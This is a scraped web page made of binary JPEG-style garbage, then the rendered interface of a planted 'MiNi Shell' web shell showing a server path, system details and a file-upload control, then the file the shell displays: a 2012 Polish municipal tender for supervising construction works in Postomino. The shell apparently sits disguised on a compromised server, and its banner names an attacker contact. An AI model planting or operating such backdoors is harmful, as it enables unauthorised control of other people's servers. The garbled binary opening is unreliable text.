JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120417/121582-N-2012.html

<p class="kh_header"><b>Postomino: Usługi pełnienia nadzoru inwestorskiego</b><br>
<b>Numer ogłoszenia: 121582 - 2012; data zamieszczenia: 17.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Postomino , Postomino 30, 76-113 Postomino, woj. zachodniopomorskie, tel. 0-59 810 85 93, faks 0-59 810 85 84.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.postomino.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi pełnienia nadzoru inwestorskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są usługi pełnienia nadzoru inwestorskiego przy realizacji czterech inwestycji gminnych: budowa sieci wodociągowej Staniewice-Tyn-Pieńkówko, remont sali wiejskiej w Karsinie, remont sali wiejskiej w Pieszczu, budowa wielofunkcyjnego boiska sportowego w Korlinie.
2.	Zakres robót budowlanych:
1)	Budowa sieci wodociągowej Staniewice-Tyn-Pieńkówko 
a)	Zakres robót objętych zamówieniem obejmuje wykonanie robót sanitarnych:
-	sieci wodociągowej przesyłowej - od ujęcia wody w m. Staniewice do m. Tyn z PVC o225 i łącznej długości 3341 mb,
-	sieci wodociągowej do budynku wielorodzinnego nr 91 w m. Staniewice z PE o90 i długości 690 mb z przyłączem, 
-	sieci wodociągowej na odcinku Tyn-Pieńkówko z PVC o160 i długości 1506 mb, z PE o90 o długości 1827 mb z przyłączami z rur PEo32, o40 i o50,
-	hydrantów p.poż. podziemnych (materiał - żeliwo sferoidalne/stal nierdzewna) o80 - 16 kplz zabezpieczeniem hydrantów, zasuw i studzienek obrukowaniem o średnicy 1,0 m lub płytami betonowymi,
-	wodomierze skrzydełkowe  - o25-1szt. oraz o15-21 szt. 
b)	Z uwagi na istniejące uzbrojenie podziemne, roboty ziemne w terenie uzbrojonym należy prowadzić ze szczególną ostrożnością. Wszelkie napotkane kable i przewody obce należy zabezpieczyć i nie spowodować uszkodzenia.
c)	Inwestycja jest w trakcie realizacji; wykonano około 2 km sieci przesyłowej na odcinku Staniewice - Tyn.
d)	 Przewidywana wartość inwestycji- wynosi 847 000,00 zł netto, słownie: osiemset czterdzieści siedem tysięcy złotych., 
e)	Termin realizacji inwestycji wynikający z umowy z wykonawcą robót budowlanych: od 27.06.2011 r. do 28 września  2012 r.
2)	Remont sali wiejskiej w Karsinie 
a)	Powierzchnia użytkowa remontowanego budynku wynosi 223,55 m2,
b)	Zakres robót:
-	Rozebranie drewnianej podłogi,
-	Wykonanie podsypki z piasku z zagęszczeniem,
-	Wykonanie podbudowy z betonu,
-	Wykonanie izolacji przeciwwilgociowej z papy termozgrzewalnej,
-	Ocieplenie posadzki styropianem,
-	Wykonanie wylewki cementowej dozbrojeniem,
-	Ułożenie płytek gres na posadzce z cokolikiem,
-	Wymiana tynków wewnętrznych, 
-	Wymiana podsufitki drewnianej na płyty,
-	Docieplenie dachu,
-	Wymiana instalacji elektrycznej,
-	 Wymiana instalacji wodnej i kanalizacyjnej,
-	Wymiana stolarki okiennej i drzwiowej,
-	Wymiana ogrzewania wodnego na elektryczne, 
-	Wymiana osprzętu sanitarnego,
-	Wykonanie wentylacji,
-	Docieplenie ścian zewnętrznych wraz z pionową przeciwwodną izolacją ścian przyziemia,
-	Wykonanie opaski z kostki wokół budynku, chodników i daszku nad wejściem głównym,
-	Obłożenie schodów zewnętrznych płytami antypoślizgowymi,
-	Wymiana tablicy bezpiecznikowej z osprzętem.
c)	Przewidywana wartość inwestycji- wynosi 206 809,42 zł netto, słownie: dwieście sześć tysięcy osiemset dziewięć złotych 42/100,
d)	Termin realizacji robót budowlanych - 180 dni od dnia podpisania umowy (przewidywany termin podpisania umowy - 17 kwietnia 2012 r.).
3)	Remont sali wiejskiej w Pieszczu 
a)	Remontowana sala wiejska wykonana metodą tradycyjną, murowana z cegły czerwonej pełnej, jednokondygnacyjna o wymiarach w rzucie 12,3 x 18,85 m. Dach o konstrukcji drewnianej - wiązary dachowe, dwuspadowy kryty papą na deskowaniu pełnym. Posadzki - podłogi drewniane z desek na legarach w sali. 
b)	Zakres robót objętych zamówieniem obejmuje między innymi:
-	Wymianę starego pokrycia z papy na blacho dachówkę powlekaną z obróbkami blacharskimi na powierzchni 261,03 m2z wykonaniem podsufitki podwieszonej,
-	Wymianę posadzki z desek w sali i pomieszczenia sceny na gresy z ociepleniem na powierzchni 180,4 m2,
-	Wydzielenie z powierzchni sceny dwóch pomieszczeń, tj. zaplecza kuchni 
i magazynku ściankami działowymi,
-	Remont powierzchni sanitarnych,
-	Wymianę stolarki okiennej drewnianej na PCV, stolarki drzwiowej wewnętrznej,
-	Roboty malarskie,
-	Ocieplenie ścian budynku sali styropianem grubości 14 cm,
-	Wykonanie daszku nada wejściem głównym,
-	Wykonanie instalacji elektrycznej oświetlenia i ogrzewania,
-	Wykonanie instalacji sanitarnych - wod. kan. z wymianą urządzeń sanitarnych,
-	Utwardzenie terenu - chodnik do sali z kostki brukowej grubości 6 cm na powierzchni 76 m2.
c)	Przewidywana wartość inwestycji- wynosi 189 342,14 zł netto, słownie: sto osiemdziesiąt dziewięć tysięcy trzysta czterdzieści dwa 14/100 zł,
d)	Termin realizacji robót budowlanych-180 dni od dnia podpisania umowy (przewidywany termin podpisania umowy  - kwiecień 2012 r. ).
4)	Budowa wielofunkcyjnego boiska sportowego w Korlinie 
a)	Przedmiotem zamówienia na roboty budowlane jest budowa wielofunkcyjnego boiska sportowego o nawierzchni poliuretanowej przy Zespole Szkół Społecznych w miejscowości Korlino wraz z przełożeniem kabla telekomunikacyjnego.,
b)	Zakres robót objętych zamówieniem obejmuje wykonanie:
-	Boiska wielofunkcyjnego wraz z pasami bezpieczeństwa o nawierzchni poliuretanowej o powierzchni - 608 m2, 
-	Chodniki - dojścia z kostki betonowej  - 130,5 m2,
-	Ogrodzenie- piłkochwyt z siatki na słupkach o wysokości 4 m z dwoma furtkami - 108 m, 
-	Usunięcie kolizji kabla telefonicznego z projektowaną budową boiska wielofunkcyjnego.
c)	Wymiar ogólny boiska - 32x19 m, z liniami rozgraniczającymi i stosownym wyposażeniem, w tym:
-	boisko do gry w koszykówkę  - 28x15 m,
-	boisko do gry w siatkówkę  - 18x9 m,
-	boisko do gry w badmintona - 13,4x6,1m.
-	Dodatkowo należy wykonać boisko do gry w piłkę ręczną z odpowiednimi liniami rozgraniczającymi, z bramkami aluminiowymi z profilu 80x80 tulejowane o wymiarach 3,0x2,0m. Głębokość bramki 1,0 m. rama bramki malowana w biało-czerwone pasy. Pałąki bramki z utwardzonych aluminiowych rur o 2,5 cm. Haki mocujące siatkę wykonane z metalu. 
d)	Przewidywana wartość inwestycji- wynosi 184 838,00 zł netto, słownie: sto osiemdziesiąt cztery tysiące osiemset trzydzieści osiem złotych,
e)	Termin realizacji robót budowlanych: od dnia podpisania umowy do 14 sierpnia 2012 r. (trwa procedura przetargowa wyboru wykonawcy robót budowlanych).
3.	Zakres w/w inwestycji opisany  jest w Specyfikacjach Istotnych Warunków Zamówienia, które udostępnione są  na stronie internetowej www.postomino.bip.net.pl.
4.	Wykonawca usług nadzoru inwestorskiego w ramach przedmiotu zamówienia zobowiązany jest w szczególności do:
1)	Co najmniej 1 raz na 2 tygodnie stawienia się osobiście w Urzędzie Gminy  Postomino wraz z pisemną informacją o stanie zaawansowania robót wszystkich inwestycji opisanych w Opisie przedmiotu zamówienia, przyczynach ewentualnych opóźnień w wykonywaniu robót i stosunku Wykonawcy do realizacji przedmiotowego zamówienia, 
2)	Co najmniej 1 raz w tygodniu wizytowania, nadzorowania budowy wszystkich inwestycji opisanych w Opisie przedmiotu zamówienia i złożenia w tym zakresie informacji o postępie, jakości i stanie zaawansowania wykonywanych robót,
3)	Nadzoru technicznego nad realizacją robót we wszystkich branżach pod względem ich zgodności z dokumentacją techniczną, podpisaną umową oraz przepisami prawa budowlanego i sztuką budowlaną, 
4)	Sprawdzania jakości wykonanych robót i wbudowanych wyrobów budowlanych, 
a w szczególności zapobiegania zastosowania wyrobów budowlanych wadliwych
i niedopuszczonych do stosowania w budownictwie,
5)	Dokonywania przy udziale zamawiającego odbiorów częściowych oraz odbioru końcowego zadania oraz przekazania zadania wraz z wymaganą dokumentacją powykonawczą,
6)	Sprawdzenia i odbioru robót budowlanych ulegających zakryciu lub zanikających, uczestniczenia w próbach i odbiorach technicznych, 
7)	Udziału w przeglądach gwarancyjnych wykonywanej inwestycji oraz nadzoru nad usuwaniem ewentualnych usterek bez dodatkowej zapłaty za te czynności,
8)	 Potwierdzania faktycznie wykonanych robót oraz usunięcia wad,
9)	Sprawdzania i rozliczania faktycznie wykonanych robót zgodnie z umową zawartą z wykonawcą wraz z potwierdzaniem kwot do zapłaty (sprawdzanie faktur przedłożonych przez wykonawcę robót),
10)	Uzgodnienia z Zamawiającym oraz uzyskania zgody na ewentualne zmiany w trakcie realizacji zadania zleconego zadania,
11)	Udzielania ustnych i pisemnych informacji o realizacji zadania na żądanie Zamawiającego,
12)	Stałej konsultacji i doradztwa fachowego na rzecz zamawiającego, opiniowania ewentualnych zmian w dokumentacji oraz organizowania i uczestniczenia w naradach technicznych dotyczących realizacji zadania,
13)	Dokonania innych niezbędnych czynności dla Zamawiającego na etapie realizacji inwestycji.
5.	Inspektorzy nadzoru inwestorskiego będą działać w granicach umocowania określonego przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (t. j. Dz. U. z 2006 r. nr 156, poz. 1118 z późn. zm.).
6.	Usługi pełnienia nadzoru inwestorskiego przy realizacji inwestycji Budowa sieci wodociągowej Staniewice-Tyn-Pieńkówko realizowane są w ramach działania Podstawowe usługi dla gospodarki i ludności wiejskiej objętego Programem Rozwoju Obszarów Wiejskich na lata 2007 - 2013. Usługi pełnienia nadzoru inwestorskiego przy realizacji pozostałych inwestycji realizowane są w ramach działania Odnowa i rozwój wsi objętego Programem Rozwoju Obszarów Wiejskich na lata 2007-2013. 
7.	Kod CPV Wspólnego Słownika Zamówień: 71520000- 9 Usługi nadzoru inwestorskiego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 180.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- 
w tym okresie, co najmniej:
a)	jedną usługę w zakresie nadzoru inwestorskiego przy budowie sieci kanalizacji sanitarnej lub wodociągowej oraz załączy dokumenty potwierdzające, że te usługi zostały wykonane należycie,
b)	dwie usługi w zakresie nadzoru inwestorskiego przy budowie, rozbudowie lub remoncie budynku o wartości roboty budowlanej nie mniejszej niż 200 000,00 zł brutto każda oraz załączy dokumenty potwierdzające, że te usługi zostały wykonane należycie,
c)	jedną usługę w zakresie nadzoru inwestorskiego przy budowie boiska sportowego o nawierzchni poliuretanowej oraz załączy dokumenty potwierdzające, że te usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca zapewni przy realizacji zamówienia udział:  
a)	inspektora nadzoru posiadającego uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
b)	inspektora nadzoru posiadającego uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej,
c)	inspektora nadzoru posiadającego uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
(Zamawiający akceptuje uprawnienia budowlane odpowiadające uprawnieniom wymaganym przez Zamawiającego, które zostały wydane na podstawie wcześniej wydanych przepisów oraz zagraniczne uprawnienia uznane w zakresie i na zasadach opisanych w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści oferty.
2.	Zamawiający zgodnie z art. 144 ustawy PZP przewiduje możliwość wprowadzenia istotnych zmian do treści zawartej umowy w następującym zakresie: 
1)	wynagrodzenia Wykonawcy, na skutek zmiany przepisów prawnych, w tym zmiany stawki od podatku od towarów i usług mającej zastosowanie do przedmiotu umowy, 
2)	osób wskazanych przez Wykonawcę do pełnienia funkcji inspektora nadzoru, przy czym nowo wskazana osoba powinna spełniać wymagania określone przez Zamawiającego w dziale V ust. 1 niniejszej SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.postomino.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Postomino, Postomino 30, 76-113 Postomino, pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2012 godzina 10:00, miejsce: Urząd Gminy Postomino, Postomino 30, 76-113 Postomino, pokój nr 19-sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com